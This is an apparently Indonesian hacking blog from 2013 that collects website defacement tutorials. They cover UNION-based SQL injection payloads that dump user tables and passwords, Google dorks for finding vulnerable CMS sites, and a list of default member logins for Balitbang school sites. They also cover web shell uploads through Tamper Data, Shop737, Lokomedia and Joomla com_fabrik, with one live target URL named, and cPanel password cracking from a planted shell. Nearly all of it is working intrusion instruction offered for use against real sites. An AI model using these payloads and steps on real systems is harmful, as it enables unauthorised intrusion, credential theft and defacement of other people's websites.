Senin, 11 November 2013

Hacking And Deface Website With SQL Injection


Pengertian SQL INJECTION :
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ' atau �
comments: /* atau �
information_schema untuk versi: mysql versi 5.x
( tidak support untuk mysql versi 4.x )

1.      Cari Target + Bugnya
Cara mencarinya adalah dengan dork sql injection. Misalnya inurl:index.php?id= search dengan om GOOGLE, misalkan kita mendapatkan alamat situs

http://www.target.com/index.php?id=4

Lalu untuk mengetahui suatu web memiliki bug SQL injection, tambahkan sebuah tanda petik pada akhir url, sehingga urlnya menjadi

http://www.target.com/index.php?id=4

lalu tekan enter dan apa yang terjadi pada situs tersebut? Situsnya menampilkan pesan error, berarti parameter id tidak di filter dengan baik atau bahkan tidak difilter sama sekali. Untuk mengetahui suatu web aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah and+1=1--
Ketika di tambahkan parameter +and+1=1-- pada akhir URL, situsnya tampil dengan normal karena 1=1 menghasilkan nilai true.

http://www.target.com/index.php?id=4
+and+1=1--

Dan ketika di tambahkan parameter +and+1=2-- isi berita tidak dapat ditampilkan karena 1=2 hasilnya false dan ini membuktikan bahwa web aplikasi tersebut  99.9% memiliki bug SQL Injection

http://www.target.com/index.php?id=4
+and+1=2--

2.      Cari Column Yang Memiliki Celah Injection
Setelah saya tau bahwa web tersebut memiliki Bug SQL Injection saya harus mencari tau nama table dan column, tapi sebelum itu saya harus mencari tau pada column ke berapa saya bisa melakukan Injection, untuk itu saya menggunakan perintah +order+by+ perhatikan url berikut.

http://www.target.com/index.php?id=4
+order+by+1--
http://www.target.com/index.php?id=4+order+by+2--
http://www.target.com/index.php?id=4+order+by+3--
http://www.target.com/index.php?id=4+order+by+4--
http://www.target.com/index.php?id=4+order+by+5--

url diatas jika di coba satu persatu akan menampilkan situsnya secara normal. Tapi ketika saya menginputnya dengan order+by+6--apa yang terjadi??? Browser menampilkan pesan error. Dari pesan error tersebut bisa dipastikan terdapat 5 buah column yang terdapat disalah satu table yang belum kita ketahui namanya. Berarti yang kita ambil sampai +order+by+5-- saja.
3.      Gunakan Perintah Union Select
Setelah saya mengetahui terdapat 5 buah column pada target, selanjutnya yaitu mencari column yang bisa dilakukan injeksi. Untuk itu saya menggunakan perintah +union+select+ (pakai union all select juga bisa koq) sehingga urlnya menjadi :

http://www.target.com/index.php?id=4
+union+select+1,2,3,4,5--

Dan apa yang tampak di browser tidak ada yang aneh bukan? situsnya tampil dengan normal. Tetapi jika parameter id saya ganti menjadi -4 yang pastinya tidak ada isi data -4 di Database.

http://www.target.com/index.php?id=
-4+union+select+1,2,3,4,5--

Oke disini browser menampilkan angka 2 & 3, dan angka inilah yang sering disebut dengan angka ajaib, karena angka tersebut adalah letak column dimana attacker bisa melakukan injeksi lebih lanjut.
4.      Cari informasi Database Target
Dengan tampilnya angka ajaib tersebut anda bisa 'mengintip' beberapa informasi seperti nama database, nama user database, versi database, sessi user dll. Untuk melihat nama database, injeksi urlnya menjadi

http://www.target.com/index.php?id=
-4+union+select+1,database(),3,4,5--

Dan disini browser menampilkan nama database yaitu xyb_injector. Saya mencoba mengintip lagi nama user database pada situs tersebut dengan menginjeksinya pada column ke-2 dan versi pada column ke-3 dan url injeksinya menjadi :

http://www.target.com/index.php?id=
-4+union+select+1,user(),version(),4,5--

Ternyata user dabasenya root@localhostdan beruntung sekali karena versi mysql yang di gunakan adalah versi 5.0.51a-community, lho emangkenapa kalo versi 5??? Karena bisa dilanjutin bacanya :D, kalo misalkan versi 4 tinggalin aja deh, cari target baru, hahahaha ?.
Coba anda perhatikan, anda hanya bisa meng-injeksi satu perintah pada satu column. Bisakah meng-injeksi lebih dari satu perintah pada satu colums??? Heheheh tentu saja bisa dong, untuk itu anda bisa menggunakan perintah yang sudah disediakan langsung oleh mysql yaitu perintah concat(perintah1,perintah2). Contoh dibawah ini saya meng-intip nama user dan nama database pada column ke-2 dan pada column ke-3 saya mengintip versi databasenya.

http://www.target.com/index.php?id=4
+union+select+1,concat(user(),0x3a,database()),version(),4,5--

5.      Dapatkan Nama Table
Saya sudah mendapatkan informasi database web tersebut, sebenarnya yang saya butuhkan hanyalah versi databasenya saja, seperti yang sudah anda lihat, versi database yang ditampilkan adalah 5.0.51a-communitydan tentu ini memudahkan saya dalam mendapatkan table dengan menggunakan perintah table_name pada column yang memiliki bug yaituangka 2 atau 3 pada web tersebut. Di akhir statement tambahkan from+information_schema.tables+where+table_schema=database()+limit+0,1--
Sehingga urlnya menjadi :

http://www.target.com/index.php?id=4
+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--

Di web tersebut tampil sebuah table bernama "table_attacker". Untuk melihat seluruh table sekaligus gunakan perintah group_concat(table_name) pada column yang memiliki bug, sehingga urlnya menjadi

http://www.target.com/index.php?id=4
+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--

Hihihi sip, seluruh table berhasil saya dapatkan, diantara table tersebut, table manakah yang harus saya telusuri lebih jauh lagi??? table_user sepertinya menarik :P yuk kita lihat apa isinya.
6.      Dapatkan Nama Column
table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi

http://www.target.com/index.php?id=4
+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi :
http://www.string-functions.com/string-hex.aspx

Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi

http://www.target.com/index.php?id=4
+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x7461626c655f75736572--
< 

Alhasil nama column dari table_usersudah saya dapatkan yaitu user_id dan password_id.
7.      Dapatkan Usename & Password
Saya sudah mendapatkan nama table �table_user� yang berisi 2 buah column yaitu user_id� dan �password_id� dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal) dimasukkan setelah angka terakhirsehingga urlnya menjadi :
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user--

Hacking DNS (DNS POISONING )




INTRODUCTION
Normally, a networked computer uses a DNS server provided by the computer user's organization or an Internet service provider (ISP). DNS servers are generally deployed in an organization's network to improve resolution response performance by caching previously obtained query results. Poisoning attacks on a single DNS server can affect the users serviced directly by the compromised server or indirectly by its downstream server(s) if applicable.[citation needed]
WIKIPEDIA


In This Tutorial U just need two Software
1. Xampp Or appserv for a webserver on your PC/Leptop (Optional)
2. Cain And Abel

Why Xampp/Appserv is "Optional" ?
because we can direct target to Another IP PUBLIC, like a webhosting IP

VIDEO >>>

Sabtu, 08 Juni 2013

Deface Domain sch.id Teknik Bugbalitbang

Oke sob, seperti biasa, langsung saja kita simak bersama (^_^).
Dork in google..
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang" 

D in bing..
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
4. IP:[target-IP] blablablaa� having fun! :D
Dalam teknik ini, kita menggukan default pass member CMS Balitbang.

USERNAMEPASSWORDDETAILSSHELL UPLOAD
alan123456guruavailable
kickdody123456guruavailable
siswanto123456guruavailable
choirulyogya123456guruavailable
wardjana123456guruavailable
taufik123456guruavailable
tomi123456guruavailable
alumni123456siswanot available
070810120123456siswanot available

  
  
  
  
  








Setelah kita ketahui data - data default login member CMS Balitbang diatas, langkah selanjutnya adalah.
Sign in member form,,,
http://localhost/member/










Nah, seperti ini sob (^_^)












Login dan upload shell, lewat SIM -> Data Laporan, kemudian tambahkan laporan, nah dari sini kita upload shell kita, otomatis shell yg terupload akan berada pada path http://localhost/laporan/











Lalu terserah mau kita apakan, asal jangan merusak yaa sob (^_^)
Jangan Lupa Nitip Nama : X-Forum Hacking 
Semoga bermanfaat, dan ini sebuah peringatan kecil untuk siapa saja para penggunaCMS-Balitbang!

Cara Deface Dengan Temper Data

BAHAN :

1. Browser Mozilla
2. Add on tamper Data
3. shell(saya menggunakan hn-shell)
4. Rokok sampurna(Malrboro Putih juga boleh)
5. Koneksi internet (Pastinya)

Tutor
1. Saya asumsikan anda sudah berhasil masuk ke halaman admin dan sekarang carilah tempat dimana anda bisa upload file seperti gambar di bawah ini

d sini saya mencari tempat upload gambar





2. Kita tinggalkan dulu sebentar browser dan kita lihat shell yang udah d siapkan tadi dan ganti ekstensi nya menjadi .jpeg/.jpg


3. sekarang kita balik lagi ke halaman admin terus klik browse dan pilih shell yang udah d rubah ekstensi tadi trus klik open

4. sekarang buka Add-On Tamper Data Tool>>tamper data dan klik start tamper dan klik Update

5. Setelah itu akan muncul pilihan dan pilih tamper


6. lalu akan muncul seperti gambar di bawah ini dan Copy script yang saya lingkari dan copy ke notepad terus cari nama shell yang agan upload tadi lalu hapus ekstensi .jpeg/.jpeg lalu Copas ke Tempat yang tadi Lalu Klik Ok dan Pilih Abort Request


7. Setelah semuanya selesai cari shell yang sudah anda upload tadi di websitenya lalu Copy link address ny dan buka di tab baru....

8. Selamat anda Sudah berhasil Tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a lawang dapo

Senin, 03 Juni 2013

Deface POC shop737 Jenis Site Co.id



Cara Deface Teknik shop737 Jenis Site Co.id xD
Maaf nya kalo site nya Co.id
ok deh langsung aja ke TKP

Kalo Kurang Ngerti Lihat Video >  LIHAT


Exploit :

DORK:
intext:"Powered by Shop737" site:co.id

Upload :
http://www.site.co.id/poto/upload.php

Login :
user : admin
Password : admin

tempat Deface:
http://www.site.co.id/poto/file/nama file anda

Jumat, 31 Mei 2013

Deface Web Lokomedia

Cara ini sebenarnya adalah cara lama. Mungkin sudah banyak web yang tahu cara ini dan segera mempatch webnya, namun saya yakin pasti ada beberapa yang belum update.

Baiklah berikut caranya :

1. Kita disini menggunakan dork, copy dork berikut ke kotak pencarian google allinurl:media.php?module=berita

2. Di hasil penelusuran terdapat beberapa web, utamanya web indo. Anda buka salah satunya.

3. Setelah anda buka, coba anda masuk ke halaman login adminnya. Anda bisa menemukannya dengan menambahkan /admin/ ataupun /administrator/
Contoh : http://www.site.com/admin/ atau http://www.site.com/administrator/
Namun tidak semua web halaman loginnya begitu

Berikut contoh halaman login sebuah web




4. Jika anda menemukan halaman loginnya, anda tambahkan ini ke belakang url'nya /content.php?module=banner
Contoh : http://www.site.com/admin/content.php?module=banner

5. Jika berhasil, anda klik "tambah banner"

6. Isi kolom tersebut dengan benar. Kolom link bisa anda dikosongi, kolom nama silahkan isi terserah, kolom terakhir isi dengan shell anda

7. Kita check shell kita work atau tidak dengan cara buka http://www.site.com/admin/foto_berita/shell.php

8. Jika berhasil terbuka berarti shell anda sukses tertanam pada web tersebut, anda bisa pindahkan web shell itu pada folder web yang lebih aman agar shell dapat bertahan lama.

9. Untuk eksekusi, anda bisa rubah file index.php nya dengan script deface anda.

Cpanel Crack With Python

Download dulu toolsnya disini : DISINI
Selain itu, kamu juga harus install Phyton 2.7.3
Untuk Python download disini : DISINI

Oke gue anggap kalian udah punya shell backdoor yang sudah tertanam di web target

1. Upload cp.php dan killer.php
2. Buka killer.php sehingga muncul penampakan seperti berikut





 3. klik Use to extract usernames
4. Muncul tuh user yang 1 server


Klik untuk memperbesar
5. Setelah diklik, tunggu sebentar, dan klik configuration files
6. Akan muncul penampakan seperti ini
7. Abaikan, ekstrak tools yang udah didownload tadi ke C:\ dan buka cmd ketik perintah ini 
- cd \
- cp.py [url INDISHELL tadi] [lokasi penyimpan config]
contoh:
cp.py http://www.site.com/INDISHELL C:\New Folder
8. Akan keluar list passwordnya, copy semua list passwordnya (klik kanan -> mark -> blok list passwordnya -> tekan [ENTER] untuk meng-copy)
9. buka cp.php (yang sudah ditanam di website target)
10. Pastekan password listnya ke kolom Pass
11. Klik Start Tunggu Selesai :)

Untuk Login cpanel site.com:2082 lau masukan username dan password hasil crack tadi kawan :).
Semoga Bermanfaat Kawan ?

Jangan Lupa titip Nama X-Forum Hacking

Rabu, 17 April 2013

Deface Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

Live Target:
 http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0

1. Gunakan Dork untuk mencari Target di Google 

inurl:index.php?option=com_fabrik



 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D



3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:


Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV



5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php




 Note: Kalo ga berhasil atau error, cari target lain aja :D

7. Goodluck! :p

Video Tutorial >>> LIHAT